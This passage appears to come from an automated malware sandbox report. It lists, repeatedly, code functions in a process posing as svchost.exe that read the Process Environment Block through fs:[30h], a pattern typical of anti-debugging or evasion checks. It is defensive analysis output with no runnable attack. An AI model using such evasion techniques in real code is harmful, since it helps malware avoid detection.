                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] | 2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h] | 2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h] | 2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h] | 2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h] | 2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] | 2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] | 2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] | 2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h] | 2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h] | 2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h] | 2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h] | 2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h] | 2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h] | 2_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] | 2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] | 2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] | 2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] | 2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] | 2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] | 2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] | 2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] | 2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] | 2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] | 2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] | 2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] | 2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] | 2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h] | 2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h] | 2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h] | 2_2_03028B50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h] | 2_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h] | 2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] | 2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] | 2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] | 2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] | 2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] | 2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] | 2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] | 2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] | 2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h] | 2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h] | 2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h] | 2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h] | 2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h] | 2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h] | 2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] | 2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] | 2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h] | 2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] | 2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] | 2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] | 2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h] | 2_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h] | 2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h] | 2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] | 2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] | 2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h] | 2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] | 2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] | 2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h] | 2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h] | 2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h] | 2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h] | 2_2_03104940
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] | 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h] | 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] | 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] | 2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] | 2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h] | 2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] | 2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] | 2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h] | 2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h] | 2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
